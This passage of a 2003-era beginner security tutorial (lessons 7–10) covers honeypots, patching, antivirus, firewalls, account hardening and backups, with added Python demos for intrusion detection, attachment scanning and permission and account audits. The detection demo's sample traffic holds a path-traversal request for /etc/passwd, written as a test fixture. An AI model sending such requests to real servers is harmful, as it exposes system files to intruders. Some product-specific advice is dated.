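        for name, port, pattern in SIGNATURES:
            if (port is None or f["dst_port"] == port) and pattern in f["payload"]:
                alerts.append((f["t"], f["src"], name))
    return alerts


# --- anomaly-based: compare against a known-good baseline ------------------
def connections_per_minute(flows):
    """{src: Counter{minute: number of new connections}}."""
    table = defaultdict(Counter)
    for f in flows:
        table[f["src"]][f["t"] // 60] += 1
    return table


def build_baseline(training_flows, window_minutes):
    """Per host, mean and population stdev of connections per minute over a
    known-good window; minutes with no traffic count as zero."""
    baseline = {}
    for src, per_min in connections_per_minute(training_flows).items():
        counts = [per_min.get(m, 0) for m in range(window_minutes)]
        baseline[src] = (mean(counts), pstdev(counts))
    return baseline


def anomaly_alerts(flows, baseline, k=3.0, min_delta=5):
    """Alert when a host exceeds mean + k*stdev connections in one minute.
    The min_delta floor stops a quiet host (stdev 0) alerting on one extra
    connection; hosts absent from the baseline get a zero baseline."""
    alerts = []
    for src, per_min in connections_per_minute(flows).items():
        mu, sigma = baseline.get(src, (0.0, 0.0))
        threshold = max(mu + k * sigma, mu + min_delta)
        for minute, count in sorted(per_min.items()):
            if count > threshold:
                alerts.append((minute * 60, src, f"{count} connections/min vs baseline {mu:.1f}"))
    return alerts


# --- constructed traffic ----------------------------------------------------
def flow(t, src, dst, port, payload):
    return {"t": t, "src": src, "dst": dst, "dst_port": port, "payload": payload}


def training_flows():
    """Ten quiet minutes: the PC browses, the server runs one backup connection a minute."""
    flows = []
    for m in range(10):
        for i in range(4):
            flows.append(flow(m * 60 + i * 15, "192.168.1.10", "203.0.113.5", 80, b"GET / HTTP/1.0"))
        flows.append(flow(m * 60 + 30, "192.168.1.20", "192.168.1.30", 445, b"backup"))
    return flows


def live_flows():
    """Two minutes to analyse: normal browsing, one outside probe that matches a
    signature, and a worm-like fan-out from the server with no signature at all."""
    flows = []
    for m in (10, 11):
        for i in range(4):
            flows.append(flow(m * 60 + i * 15, "192.168.1.10", "203.0.113.5", 80, b"GET / HTTP/1.0"))
    flows.append(flow(10 * 60 + 5, "198.51.100.7", "192.168.1.10", 80, b"GET /../../etc/passwd HTTP/1.0"))
    for n in range(60):
        flows.append(flow(11 * 60 + n, "192.168.1.20", f"203.0.113.{10 + n}", 1434, b"CONSTRUCTED-WORM-MARKER"))
    return flows


def analyse():
    """Return (signature alerts, anomaly alerts) for the constructed live traffic."""
    baseline = build_baseline(training_flows(), window_minutes=10)
    live = live_flows()
    return signature_alerts(live), anomaly_alerts(live, baseline)


if __name__ == "__main__":
    sig, anom = analyse()
    print("signature alerts:", sig)
    print("anomaly alerts  :", anom)
```

The trade-off the text describes is visible in the output: the signature engine names exactly what it saw but is blind to the unknown worm, while the anomaly engine flags the worm but can only say that the server's behaviour changed, not why.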
You may have heard the phrase “You’ll catch more flies with honey than with vinegar.” Well, this logic has been applied to network security as well. SearchSecurity.com defines a honeypot as “a computer system on the Internet that is expressly set up to attract and “trap” people who attempt to penetrate other people’s computer systems.”
This definition is workable but misses the mark in my opinion. One use of a honeypot is to lure would-be attackers away from their true target by offering a target that seems more enticing. In effect, the honeypot acts as a decoy so that the real targets go unnoticed. Often the honeypot does not yield information allowing you to identify or “trap” the attacker. The value of the honeypot lies in the information that is collected, which helps you to identify how and when the attackers entered the system. Using this information an administrator can learn what new techniques are being used by attackers and use it to harden and protect their real systems.
It is still important to protect individual systems with antivirus software and keep the operating systems and applications patched and updated, but running perimeter defense systems like the ones we discussed in this lesson provide an extra layer of defense. The firewall can help you to restrict or block the flow of unwanted network traffic. The IDS can monitor network traffic and alert you when an attack is in progress. And, the honeypot can be used as a decoy or to gather reconnaissance information on new hacker techniques. Each of these plays a slightly different role and can be used alone or in combination to secure your network perimeter.
With Lesson 8 we begin to enter the home stretch in the 10-part Computer Security 101 Series. The object of Computer Security 101 is to provide an introduction for new or novice users to the technology, terminology and acronyms commonly used with computers and networks. Understanding these things better will hopefully help people understand what, how and why they need to secure their computers as well.
Lesson 7 was dedicated to hardware and software based firewalls. With Lesson 8 we will begin discussing preventive and proactive measures users can or should take to protect themselves from hacking, viruses and other malicious threats.
According to one security research firm there have been 28 vulnerabilities identified for the Windows XP Home operating system between January 1, 2003 and June 30, 2003. For Windows 2000 during that same time frame there were 32 vulnerabilities identified. Depending on the version of Linux you might be running there were up to 14 vulnerabilities identified.
The vulnerabilities mentioned above apply only to the operating system itself too. The Internet Explorer web browsing software had 20 vulnerabilities identified during the period from January 1, 2003 to June 30, 2003. There was 1 vulnerability identified for the Adobe Acrobat Reader software and 18 vulnerabilities identified for the popular Apache web server program.
The point of all of this is that if you haven’t been paying attention and applying patches as they become available for your system and applications you could be vulnerable to more attacks and exploits than you’d care to count.
Not all of these vulnerabilities are created equally. Many, if not most, are minor annoyances. The set of conditions necessary to actually exploit the vulnerability can be so specific and / or the potential damage from the vulnerability may be so minor that it’s hardly worth taking notice. But, every once in a while a vulnerability comes along that, if properly exploited, can lead to the complete and total compromise of your computer system.
That means the attacker could potentially read, copy or delete any file on your system- personal information, financial information, family photos. They could also secretly place backdoors to allow them to continue getting into your system even if you do patch the vulnerability after the fact. Your system could have software installed that will allow the attacker to use your computer to initiate attacks on other computers.
Sometimes the exploitation of these vulnerabilities can be automated through a virus or worm. Most of the viruses and worms that have had significant impact on the Internet in the past few years actually took advantage of known vulnerabilities for which patches had been available for months.
Earlier this year the SQL Slammer worm generated so much traffic that it essentially brought the Internet to its knees for a weekend- the routers and servers that direct the flow of traffic could not handle the volume. SQL Slammer exploited a flaw in Microsoft’s SQL Server software for which a patch had been made available over 6 months prior. Unfortunately a good percentage of the SQL Servers in the world had not been patched. If they had SQL Slammer might have fizzled out and nobody would have even noticed it.
Why should you care? Many people believe they have no files or information of significant value or confidentiality on their PC’s so they have no reason to care if their computer gets hacked. As mentioned above though, leaving your system vulnerable could allow an attacker to hijack it and use it to attack other computers. It could also mean that your machine could end up propagating the next big virus or worm and infecting hundreds or thousands of other computers. As a member of the Internet-user community you have a responsibility (see False Sense of Security) to do what you can to keep the community secure even if you don’t care about protecting yourself.
Depending on the operating system or application vendor, keeping up to date with patching can be quite simple. Many vendors have mailing lists you can join to automatically receive an email when there are new vulnerabilities discovered or patches released. You can also join 3rd-party mailing lists for your specific operating system or application, or even a mailing list that discusses vulnerabilities in general. One of the best-known sources for such lists is Bugtraq.
For the Microsoft Windows platform you can use the Automatic Update feature. It allows you to control when and how the updates are retrieved and installed. Using a feature like this can keep you current with patching with a minimum of effort on your part.
The Windows Automatic Update only pushes out critical updates though. You should still periodically run a scan using something like Microsoft Baseline Security Analyzer (MBSA)- a free tool available from Microsoft. MBSA will scan your system and let you know not only what patches you may be missing, but also other security issues like accounts with no passwords or having the Guest account enabled.
You can also go to the Windows Update web site. The site will perform a scan of your system and let you know what patches or updates you are missing. They are divided into three categories: Critical Updates & Service Packs, Windows XP and Driver Updates- so you can narrow down which ones may be important to you.
Even if your system is properly patched, running current antivirus software and sitting behind a firewall, it is still good practice to shut your system down when it’s not in use.
This advice is particularly useful for those with broadband connections such as cable modems and DSL connections. Users who dial up are generally less susceptible to attacks for two reasons: the 56k connection is too slow for hackers to work effectively and dial-up users only stay connected long enough to do what they need to do and then they disconnect from the Internet.
Users of broadband are generally connected to the Internet 24 hours a day, 7 days a week with connection speeds significantly faster than dial-up connections. No matter how well you patch and protect your system a hacker may find a way in given an unlimited amount of time like that. Most home users don’t implement or check security logs (see Plan Ahead to Catch an Intruder) and would have virtually no way of knowing what their computer was doing at 3am.
Patches and virus updates take time as well. Even if you are diligent about keeping up with these changes you may still be vulnerable for hours or even days before the vendor releases a patch or your antivirus software vendor puts out the update to detect the new threat. Obviously, you are vulnerable to this even while using the computer, but the point is that you gain nothing by leaving the computer running and connected to the Internet waiting to be victimized longer than necessary.
The final word of advice for this lesson is that you should not run programs you don’t know about. This is primarily related to email attachments, but can apply just about anywhere. It is mind-boggling how many people will receive an email claiming to be from Microsoft support with a pornographic message body written in broken English and still execute the attached file- as if Microsoft would send you an unsolicited joke or picture.
For the record, even when Microsoft support does send an alert or communication they never include file attachments. They only include links back to the Microsoft web site where you can download the file at your leisure. Not only would sending an executable file attachment cause problems in and of itself, but it would be very taxing on the Internet servers and routers if Microsoft sent an actual file attachment to all registered customers every time there was a new patch or vulnerability. The same is true for most other operating system and application vendors for the same reasons.
If you have even the slightest apprehension or suspicion about a file- don’t open it. It’s not worth infecting your system or unknowingly installing a Trojan on your system just to satisfy your curiosity to see if the attached joke really IS the funniest thing ever.
If you receive an email attachment or find some mysterious file on your computer and you just have a burning desire to open it and find out what it really is or does you should at the very least scan it for viruses. Make sure you are running the most current update of your antivirus software first and scan the file before executing it. You may also want to shut down your Internet connection first to prevent any virus or worm from propagating in the event that you do in fact become infected.
That does it for Lesson 8. To recap, the preventive and proactive steps that you can take to protect yourself and others are:
• Keep up with vulnerabilities on your operating system and applications and apply patches as they become available.
• Turn off your computer or disconnect from the Internet when you will not be using it for an extended amount of time- like overnight.
• Do not execute any file that you don’t recognize or have any suspicion or apprehension about what it might do. If you must open the file, scan it for viruses first.
The first 7 lessons of the Computer Security 101 series discussed various technologies and terminology associated with using computers and being on the Internet and what some of the major pitfalls are. The goal is that hopefully by knowing a DNS from a DHCP from a DoS you can better understand the nature of new threats when you hear about them and what you should do to protect your computer or network.
This lesson will pick up where Lesson 8 left off- talking about the different steps you can take to try and make your Internet experience safer and protect yourself from hackers and malicious code. Lesson 8 covered vulnerability patching, shutting down your system when not in use and making sure you know what a program is before you execute it.
These probably should have been in Lesson 8, but we’ll start Lesson 9 with two of the most important preventive measures- run a current antivirus software program and a current personal firewall program at all times.
Antivirus software blocks known viruses, worms, Trojans and other malicious code by comparing it with signatures of known malware. Most antivirus software also has the ability to perform heuristic scanning which uses known signs or patterns of malware to try and detect viruses or worms that aren’t yet known and for which your software doesn’t have a signature to match it against.
There are generally three components to antivirus software. One monitors incoming email and email file attachments. One monitors incoming Internet traffic and file downloads. The third one scans your entire computer in the background while you work. If you find a suspicious file you can choose to scan that file manually.
Instead of trying to guess if that message from firstname.lastname@example.org with the MPG file attachment is legitimate or not, your antivirus software should immediately flag any known viruses or other malicious code and alert you. You can usually configure how you want virus detections handled- automatic quarantine of the file, automatic deletion of the file or you can have the antivirus software ask you at each detection how you want to handle it.
If you don’t want to spend money to buy an antivirus program you can check out free antivirus applications at Free Antivirus and Virus Removal Software.
A personal firewall software application monitors all incoming and outgoing network traffic and blocks unauthorized packets from getting through. Different programs may use different methods (packet filtering, circuit-level gateway, stateful inspection, etc. – for more information see What Is A Firewall?) to filter and block unauthorized traffic.
Using a firewall is like having your house completely locked up except for one entrance and that one entrance has an armed security guard- the firewall. Not using a firewall is like leaving your door open and your windows unlocked and hoping nobody sneaks into your house when you’re not looking.
Setting up and using a firewall program properly to secure your computer can be tricky so you need to make sure you pick one that you are comfortable with and then familiarize yourself with the interface and controls. Simply installing a firewall program will not help you if you then set it up to allow all incoming traffic. It would be like that security guard at your house falling asleep and letting intruders come and go as they please.
Products such as ZoneAlarm (free for personal use- see Free Personal Firewall Software) not only block incoming packets and ports as you specify, but also monitor the interaction of programs on your computer with the operating system and its services. Watching for suspicious activity and anomalous outbound traffic is helpful to detect when your computer has been hacked or infected by a Trojan or some other malicious code which is trying to establish an outbound connection or perform functions on your system that shouldn’t be allowed.
Most antivirus vendors release scheduled updates to their virus definitions once a week. If there is a new threat that is spreading rapidly or is unusually destructive they will sometimes release an update mid-week. But, the bottom line is that even if you diligently update your virus definitions weekly, there are still 7 days where you are potentially vulnerable to any new threats.
Even if you update daily there may be a span of a few hours between the initial discovery of a new threat and the release of new virus definitions by your antivirus software vendor to detect that threat. To protect yourself during these vulnerable periods and from malicious activity in general you can take other preventive actions.
For starters- disable hidden file extensions in Windows. Many viruses rely on a common Windows “feature” to help trick the user into unwittingly executing an infected file attachment. By default Windows hides the file extension for certain file types. Rather than showing “myfile.exe” you will only see “myfile” when viewing a folder or on an email attachment. If a virus comes in as a file attachment called “coolpic.jpg.exe” Windows will drop the EXE and you will see “coolpic.jpg” which may trick you into believing the file is simply a picture or graphic image rather than an executable file.
There doesn’t seem to be any particular use per se for this feature. It seems its sole reason for existence is to make the computing experience “easier” for the Windows audience by not cluttering the screen with “techie” terms like EXE or VBS. Since you gain nothing by hiding the file extensions it makes sense to disable this feature so you don’t fall prey to having it used against you.
To change the default setting you should open Windows Explorer. At the top of the Windows Explorer window you need to click on Tools –> Folder Options (Folder Options may be listed under View in older versions of Windows). Click on the View tab and then uncheck the box labeled “hide extensions for known file types” and click OK at the bottom.
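Added example, not from the original lesson: a small Python checker that mimics the signature-plus-heuristic scanning described under antivirus software above and the double-extension trick just described, and shows what Explorer displays with extensions hidden. The extension lists, the sample file names and the hash database are constructed for illustration.

```python
"""Toy attachment checker: signature match plus a double-extension heuristic."""
import hashlib
import os

# Extensions Windows runs as programs or scripts (constructed list, not exhaustive).
EXECUTABLE_EXTENSIONS = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js"}
# Harmless-looking extensions an attacker may place in front of the real one.
DECOY_EXTENSIONS = {".jpg", ".jpeg", ".gif", ".png", ".txt", ".doc", ".mp3", ".mpg"}

# Constructed "signature database": the SHA-256 of a harmless sample byte string
# stands in for the hash a real antivirus signature would match.
SAMPLE_WORM_BODY = b"constructed sample worm body, not real malware"
KNOWN_BAD_HASHES = {
    hashlib.sha256(SAMPLE_WORM_BODY).hexdigest(): "Constructed.Worm.A",
}


def displayed_name(filename, hide_known_extensions=True):
    """What Explorer shows: with the default setting the last known extension
    is dropped, so 'coolpic.jpg.exe' is displayed as 'coolpic.jpg'."""
    if not hide_known_extensions:
        return filename
    stem, ext = os.path.splitext(filename)
    if ext.lower() in EXECUTABLE_EXTENSIONS | DECOY_EXTENSIONS:
        return stem
    return filename


def hidden_executable(filename):
    """Heuristic: True when the real extension is executable and the visible
    part of the name ends in a decoy extension (e.g. .jpg.exe, .DOC.SCR)."""
    stem, ext = os.path.splitext(filename)
    if ext.lower() not in EXECUTABLE_EXTENSIONS:
        return False
    _, inner_ext = os.path.splitext(stem)
    return inner_ext.lower() in DECOY_EXTENSIONS


def scan_attachment(filename, data):
    """Return (verdict, detail): 'infected' on a signature hit, 'suspicious'
    when the double-extension heuristic fires, otherwise 'clean'."""
    digest = hashlib.sha256(data).hexdigest()
    if digest in KNOWN_BAD_HASHES:
        return "infected", KNOWN_BAD_HASHES[digest]
    if hidden_executable(filename):
        return "suspicious", "double extension hides executable content"
    return "clean", ""


if __name__ == "__main__":
    # Constructed attachments: a disguised executable, a signature hit, a real picture.
    samples = [
        ("coolpic.jpg.exe", b"constructed executable bytes"),
        ("readme.txt", SAMPLE_WORM_BODY),
        ("holiday.jpg", b"\xff\xd8\xff"),
    ]
    for name, body in samples:
        verdict, detail = scan_attachment(name, body)
        print(f"{name} (shown as {displayed_name(name)!r}): {verdict} {detail}")
```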
Another security precaution you should take is to disable active scripting. This relates primarily to the Windows environment, but you can check the configuration of web browsing software on other platforms as well.
Active scripting allows web pages and HTML based documents and email to run scripts and applets that execute programs. This can be used to generate dynamic content rather than simply displaying a static page and can provide you with a richer web-surfing experience.
There are many useful benefits to active scripting- both productive and some just for pure entertainment. However, allowing active scripting to run unchecked gives cyberpunks an open license to execute malicious code on your system. It may be an applet that executes when you visit a web site or a script that runs when you open an HTML-based email message. Either way it can be used to install a virus or Trojan or any other malicious code that the attacker chooses.
Because some web sites aren’t even functional without active scripting you don’t want to necessarily disable it altogether. You do want to control which sites can execute it and which can’t though. Internet Explorer uses Security Zones to assign different privileges to different web sites. You can configure settings for Trusted, Internet, Intranet and Restricted Sites (see How to Configure IE Security). Once you have the zones configured like you want them you can add web sites to the zones as needed- adding sites that you trust and that may require active scripting to run to your Trusted Sites zone.
For the Restricted and Internet Security Zones you should disable active scripting. Most sites that you visit on the web will fall under the Internet Security Zone unless you move them to Trusted or Restricted. See How To Disable Active Scripting in Internet Explorer for more information on the specific steps involved.
Email programs like Outlook and Outlook Express allow you to configure what Security Zone HTML-based emails should be opened in. In Outlook XP you can click on Tools –> Options and then select the Security tab. Under Secure Content select the Security Zone that you wish HTML emails to run in and then select OK to close the box.
Of course you can always resort to alternative products that may be more secure or lack some of the flaws inherent with their Microsoft counterparts. There are plenty of alternative email programs and popular web browsers like Netscape and Opera. Whatever you choose just make sure you familiarize yourself with the security features and configure it properly to protect yourself.
As always you should also ensure that you stay up to date on security issues with your applications- like Internet Explorer or Outlook Express- and apply any necessary patches or security updates to protect yourself from known vulnerabilities.
That does it for Lesson 9. We covered the use of antivirus software and personal firewall software as well as exposing hidden file extensions and controlling how and when active scripts are allowed to run on your system. One lesson to go and your Computer Security 101 education will be complete!
Welcome to Lesson 10- the final lesson in the Computer Security 101 series. If you have followed the series through the previous nine lessons you should now know a little more about many aspects of computer networking, the pitfalls of being on a network and on the Internet and some steps you can take to protect yourself.
The purpose of the Computer Security 101 series is to provide you with an understanding of the core technology, terminology and acronyms that are used to network computers and connect to the Internet. Over the course of the first nine lessons we covered DNS, IP addresses, TCP/IP, ports, protocols, viruses, malicious code, antivirus software, firewalls and many other things.
Lesson 8 and Lesson 9 both focused on proactive steps you can take to protect yourself and make your Web surfing experience safe and enjoyable. We covered preventive measures such as keeping your operating system and applications patched against known vulnerabilities, not running unknown programs, and installing and running up to date antivirus and personal firewall software to name just a few.
In our final lesson we will cover a few more precautionary measures you can take. For starters, you should not log in with root or administrative privileges unless it is necessary. Many viruses and hacking attempts exploit vulnerabilities that allow the attacker to run code with the same privileges as the currently logged in user. Being logged in with root or administrative privileges could give away the keys to the vault.
Many users typically prefer to be logged in with administrative privileges so they can install programs and make system configuration changes that regular users may not be allowed to do. However, *Nix (Linux and Unix) systems allow users to run commands as the superuser (root) using “su”, and Windows 2000 and XP allow users to execute programs using “Run As”.
Both of these features allow users to perform administrative functions while logged in as regular users. For some added authority without being logged in as an administrator, Windows systems also allow users to be placed in the Power Users group, which grants them more permissions than a normal user without giving them complete administrative access.
On a similar note, after you have taken care of not being logged in as administrator you should ensure that only administrators have access to certain features, files and folders. Folders which contain files that are system critical, such as the Windows and Windows System32 folders should be restricted to read-only for users other than administrators. It doesn’t do much good to log in as a regular user if a regular user can access and modify all of the same files the administrator can.
For more information on how to set, view, change or remove permissions on files and folders in Windows you can refer to this Microsoft Knowledgebase Article. The article outlines steps you can use to check or validate the effective permissions on an object so you can tell who has what level of access given the current configuration.
The method for accomplishing this in *Nix may vary from vendor to vendor, but commands such as “chgrp” (change the group ownership of a file), “chmod” (change the permissions mode of a file) and “chown” (change the owner of a file or directory) can be used to modify things the way you want them.
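Added example for the *Nix side of this advice (constructed, not vendor tooling): a Python audit that checks a directory is owned by the expected user and carries no group or world write bit, and strips those bits with os.chmod, which is what chmod go-w does. It assumes a POSIX system; the demo() function builds a throwaway directory to audit so it runs anywhere.

```python
"""Audit and lock down directories that should be writable only by the owner."""
import os
import shutil
import stat
import tempfile


def permission_findings(path, expected_uid=0):
    """Return a list of problems with `path`: wrong owner, group-writable,
    world-writable. An empty list means the directory is locked down."""
    st = os.stat(path)
    problems = []
    if st.st_uid != expected_uid:
        problems.append(f"owned by uid {st.st_uid}, expected {expected_uid}")
    if st.st_mode & stat.S_IWGRP:
        problems.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    return problems


def lock_down(path):
    """Remove group and other write permission (equivalent to chmod go-w)
    and return the resulting permission bits."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    os.chmod(path, mode & ~(stat.S_IWGRP | stat.S_IWOTH))
    return stat.S_IMODE(os.stat(path).st_mode)


def audit_directories(paths, expected_uid=0, fix=False):
    """Audit each path; with fix=True also strip the write bits.
    Returns {path: problems} for the paths that had problems before any fix."""
    report = {}
    for path in paths:
        problems = permission_findings(path, expected_uid)
        if problems:
            report[path] = problems
            if fix:
                lock_down(path)
    return report


def demo():
    """Constructed run: make a world-writable directory, audit it with fix=True,
    then audit again. Returns (problems before, report after, final mode)."""
    root = tempfile.mkdtemp()
    target = os.path.join(root, "system32-like")
    os.mkdir(target)
    os.chmod(target, 0o777)  # the bad state: anyone can add or replace files
    me = os.getuid()         # we own the temp dir, so audit against our uid
    before = audit_directories([target], expected_uid=me, fix=True)
    after = audit_directories([target], expected_uid=me)
    final_mode = stat.S_IMODE(os.stat(target).st_mode)
    shutil.rmtree(root)
    return before.get(target, []), after, final_mode


if __name__ == "__main__":
    print(demo())  # expected: (['group-writable', 'world-writable'], {}, 0o755)
```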
Another trick you can use is to rename the Administrator account. Again, viruses and hackers tend to target the Administrator account or accounts with administrative privileges because they provide the broadest access. If you rename the Administrator account to something else you can make it at least a little bit harder for an attacker to find it. You can follow these step-by-step tutorials for changing the name of the Administrator account from Auburn University:
• Rename Administrator on Windows NT/2000
• Rename Administrator on Windows XP
Because a hacker knows that there should be an Administrator account, you should also create a replacement account called “Administrator” and give it very limited privileges like a regular user. When a hacker comes searching they will find the Administrator account they covet and if they succeed in hacking into it they will not have gained the omnipotent authority over your files and folders they thought they would get.
Admittedly this trick is by no means foolproof. The fact of the matter is that each user account created in Windows has a unique SID (Security Identifier). The last part of the SID is the RID (Relative Identifier). By default, the Administrator account has a RID of 500 and the Guest account has a RID of 501 (Wayne’s NT Resources For Administrators and Users- Tip 41). Experienced hackers know how to decipher the SID and can tell based on the SID whether the account is the true Administrator or not. There are also script-kiddie hacker tools that will automate this process for less-experienced hackers.
However, that is not a reason in and of itself not to do it. Locking your car door won’t keep professional auto thieves from taking it, but it will keep the general population from taking stuff from your car. The same logic applies here. You won’t trick everybody or keep everyone out of the Administrator account, but the more difficult you make it for the general population the better off you are.
You can also rename the Guest account, but with the same caveats as above. Because it has a default RID the real account is easily identifiable by viewing the SIDs for each user account. Whether or not you choose to change the name on the Guest account, you should assign the Guest account a strong password to prevent unauthorized users from accessing your computer using this account.
The Guest account is disabled by default, but also has a blank password by default. It is possible for hackers and malicious code to sometimes enable the Guest account after they have compromised your machine through other methods. If they have managed to gain administrative privileges they can also add the Guest account to the Administrators group to grant it elevated permissions as well. With no password assigned an enabled Guest account will grant essentially anyone access.
To add a layer of protection you should assign a strong password to the Guest account- something of 7 or more characters, preferably containing a variety of upper and lower case letters, numbers and special characters (for example the % or & symbols). You should not use your name, your dog’s name, your child’s birthdate or any other easily attainable information. In fact, the less “sense” it makes the harder it will be for anyone to guess. For more information about password security see the article Password Security. Even with a strong password in place, you should leave the Guest account disabled unless you have a specific reason to enable it.
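Added example, not part of the original lesson or any Microsoft tool: a Python audit that reads a list of local accounts with their SIDs, uses the RID rule above (500 = built-in Administrator, 501 = Guest) to check that the real administrator was renamed, that the decoy “Administrator” is unprivileged and that Guest is disabled and not in Administrators, and applies the password criteria from the paragraph above. The account records and passwords are constructed sample data.

```python
"""Audit local accounts by RID and check a password against the lesson's criteria."""
import re

ADMIN_RID = 500   # built-in Administrator, whatever it has been renamed to
GUEST_RID = 501   # built-in Guest
# Local and domain account SIDs look like S-1-5-21-<three sub-authorities>-<RID>.
SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-(\d+)$")

# Constructed sample accounts: the real Administrator still has its default
# name, and Guest has been enabled and added to Administrators.
SAMPLE_ACCOUNTS = [
    {"name": "Administrator", "sid": "S-1-5-21-11111-22222-33333-500",
     "enabled": True, "groups": ["Administrators"]},
    {"name": "Guest", "sid": "S-1-5-21-11111-22222-33333-501",
     "enabled": True, "groups": ["Guests", "Administrators"]},
    {"name": "alice", "sid": "S-1-5-21-11111-22222-33333-1004",
     "enabled": True, "groups": ["Users"]},
]


def rid_of(sid):
    """Return the RID of a local/domain account SID, or None for other SIDs."""
    match = SID_RE.match(sid)
    return int(match.group(1)) if match else None


def audit_accounts(accounts):
    """accounts: dicts with 'name', 'sid', 'enabled' and 'groups'.
    Returns a list of (finding, account name) tuples; empty means no issues."""
    findings = []
    for acct in accounts:
        rid = rid_of(acct["sid"])
        name = acct["name"]
        default_name = name.lower() == "administrator"
        privileged = "Administrators" in acct["groups"]
        if rid == ADMIN_RID and default_name:
            findings.append(("real-admin-not-renamed", name))
        if rid != ADMIN_RID and default_name and privileged:
            findings.append(("decoy-admin-has-admin-rights", name))
        if rid == GUEST_RID and acct["enabled"]:
            findings.append(("guest-enabled", name))
        if rid == GUEST_RID and privileged:
            findings.append(("guest-in-administrators", name))
    return findings


def password_meets_policy(password, personal_terms=()):
    """Strict reading of the lesson's advice: 7+ characters; upper and lower
    case letters, a digit and a special character all present; and none of
    the supplied personal terms (names, birthdates) appearing as a substring."""
    if len(password) < 7:
        return False
    classes = [
        any(c.isupper() for c in password),
        any(c.islower() for c in password),
        any(c.isdigit() for c in password),
        any(not c.isalnum() for c in password),
    ]
    if not all(classes):
        return False
    lowered = password.lower()
    return not any(term.lower() in lowered for term in personal_terms if term)


if __name__ == "__main__":
    for finding, account in audit_accounts(SAMPLE_ACCOUNTS):
        print(f"{account}: {finding}")
    for candidate in ("fido1985", "Fido#1985", "Tr%ee7house"):
        ok = password_meets_policy(candidate, personal_terms=("Fido", "1985"))
        print(f"{candidate!r}: {'ok' if ok else 'rejected'}")
```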
No matter how well you maintain your system- defragging the hard drive, deleting temporary files, etc.- and no matter how well you protect your system- antivirus software, firewall, etc.- it may one day simply crash. Either through a physical mechanical defect or through a virus or hacker deleting or compromising data, you could lose everything you have on your hard drive.
For many people this would include a lot of personal information. In this age of digital photography losing your hard drive can be the equivalent of losing all of your photo albums in a house fire or flood. You might have important documents, financial data, catalogs of audio files and other important and impossible, or at least difficult, to duplicate data.
For these reasons it is very important that you back up your data on a regular basis. The frequency you choose to back up can vary depending on the frequency your data changes. If you only add new important documents every 6 months or so, or you only update your financial data once a month, it probably isn’t necessary to perform a backup every week. You should choose a frequency that works for you and set some sort of reminder for yourself to make sure it gets done. You should also do a backup immediately after adding any critical or sensitive data.
Your backup could be burning your digital photos to CD or DVD directly. If you have a spare hard drive or an external hard drive you could simply copy the whole thing or copy files and folders directly. In most cases you are probably better off using an actual backup utility. There are tons of freeware, shareware and commercial products available to help you perform backups. These utilities generally compress data so you can back up more information in less space. Windows comes with a backup utility built-in. Some 3rd-party utilities may offer more flexibility or have product features that will make the backup process faster or easier so they may be worth looking into.
The last point about backups is that you should also store a copy in another location. If your house burns down and your computer becomes a melted blob of plastic and silicon, so will your backup media. To gain the full benefit of having the backup data you should store it somewhere else so that in the event of a complete catastrophe you can restore your data instead of losing everything all at once.
The last word of advice for Lesson 10 is to create a boot disk. Again- whether through some physical or electrical glitch or as the result of some malicious virus or worm- you may lose the ability to get into your operating system. Windows offers the ability to boot into Safe Mode which loads the bare minimum operating system- no programs or drivers that aren’t necessary. This might help you at least get into the system so you can work with it. Windows 2000 and XP also offer a Recovery Console which contains access to some tools and utilities you can use to try and restore your operating system to operational status.
Windows 98/Me offers a simple way to create a boot disk from the Control Panel. If you go to Add / Remove Programs and select Startup Disk it will create a bootable floppy disk which contains useful DOS utilities such as FDisk and Format. It also contains CD drivers so that you can access your CD-ROM drive after booting from the startup floppy as well.
The Windows 98 boot floppy will work to boot a Windows 2000 or XP system as well, but it does not have the ability to read or access NTFS drives- only FAT and FAT32. For security reasons most people use NTFS as their file system on Windows 2000 and XP. You can use a utility like the one available at NTFS.com to automatically create an NTFS-friendly boot disk, or you can follow the instructions available at ComUSolv.com to create a bootable startup floppy disk for Windows 9x/Me, NT, 2000 or XP. There are also instructions available on Microsoft’s site to help you out.
That does it. The Computer Security 101 series is now complete. Watch for more advanced lessons and lessons on more specific topics- intrusion detection, cryptography, etc.- in the future. Be sure to take the quizzes for each of the 10 lessons to see how much you’ve learned. For a true test of your Computer Security 101 knowledge watch for the Final Exam to be posted soon.